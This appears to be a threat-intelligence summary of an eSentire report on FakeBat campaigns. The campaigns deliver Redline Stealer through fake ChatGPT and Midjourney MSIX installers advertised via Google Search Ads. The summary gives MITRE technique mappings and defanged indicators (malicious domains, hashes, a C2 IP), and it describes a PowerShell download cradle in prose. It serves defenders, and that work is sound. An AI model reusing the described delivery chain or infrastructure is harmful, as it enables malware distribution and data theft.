eSentire’s Threat Response Unit (TRU) uncovered FakeBat campaigns delivering Redline Stealer via MSIX installers impersonating ChatGPT and Midjourney, abusing Google Search Ads and Advanced Installer to disguise the payloads. The operation culminates in a dropper that loads Redline in memory and presents a real ChatGPT or Midjourney page to the user to mask the intrusion. hashtags #FakeBat #RedlineStealer #ChatGPT #Midjourney #AshanaGlobalLtd
Keypoints
- TRU identified FakeBat campaigns delivering Redline Stealer via MSIX installers impersonating AI tools (ChatGPT and Midjourney).
- The campaigns use Google Search Ads to drive victims to imposter download pages for AI tools.
- MSIX packages are signed by ASHANA GLOBAL LTD and built with Advanced Installer, including executable and PowerShell components.
- Chat.ps1 downloads Redline Stealer from adv-pardorudy[.]ru and communicates with a C2 panel (Start.php and Install.php) to log infection metrics.
- The Redline sample is configured to connect to 185.161.248[.]81 with Bot ID “ChatGPT_Mid.”
- ChatGPT.exe loads the real ChatGPT site via Edge WebView2 after installation to persuade users the app is legitimate.
MITRE Techniques
- [T1189] Drive-by Compromise – Campaign used Google Search Ads to deliver imposter web pages for ChatGPT and Midjourney. [In early May, eSentire Threat Response Unit (TRU) identified an ongoing FakeBat campaign using Google Search Ads to deliver imposter web pages for ChatGPT and Midjourney.]
- [T1036] Masquerading – Impersonating major brands and services using Google Search Ads. [This campaign bears several similarities to previously identified FakeBat activity: Impersonating major brands and services using Google Search Ads.]
- [T1027] Obfuscated/Compressed Files and Information – Obfuscated PowerShell script (Chat-Ready.ps1). [In this case it executes an obfuscated PowerShell script (Chat-Ready.ps1), which ultimately is identical to the script shown in Figure 13 …]
- [T1059.001] PowerShell – PowerShell-based components used during installation. [Chat.ps1 is a basic PowerShell download cradle …]
- [T1105] Ingress Tool Transfer – Downloading and loading Redline Stealer from a remote host. [Chat.ps1 downloads and loads Redline Stealer from adv-pardorudy[.]ru into memory as an assembly.]
- [T1071.001] Web Protocols – C2 communications via HTTP requests to Start.php and Install.php. [three web requests to signal infection start, payload retrieval and successful installation of Redline.]
- [T1204] User Execution – Users interact with imposter ads/pages leading to the installer execution. [The infection flow begins with a Google search leading to an imposter download page and a Windows App Installer wizard.]
Indicators of Compromise
- [URL] hxxps://pcmartusa[.]com/gpt/ – Imposter download page for ChatGPT
- [Domain] advert-job[.]ru – FakeBat Payload Hosting/C2
- [Domain] job-lionserver[.]site – FakeBat Payload Hosting
- [Hash] 86a9728fd66d70f0ce8ef945726c2b77 – Chat-GPT-x64.msix
- [Hash] cfe067ccaa39fb203af404e1d42cb739 – Chat.ps1
- [Hash] 33ee0bb76f93a82bbab5fd4b2a903291 – ChatGPT.exe
- [Hash] 906f7ddf43b924f399518b1a0f23ed4f – Midjourney-x64.msix
- [Hash] C29215DDCD02477252E96E4CB33BD29D – Midjourney.exe
- [Hash] 50BE501494F981065825F44DDDF693F3 – Chat-Ready.ps1
- [Domain] jokeadvert[.]ru – FakeBat C2
- [Domain] adv-pardorudy[.]ru – Redline Payload
- [Hash] 7716F2344BCEBD4B040077FC00FDB543 – Redline Stealer
- [IP] 185.161.248.81 – Redline Stealer C2
- [Domain] chatgpt-t[.]com – FakeBat domain registered earlier (related to FakeBat activity)
Read more: https://www.esentire.com/blog/batloader-impersonates-midjourney-chatgpt-in-drive-by-cyberattacks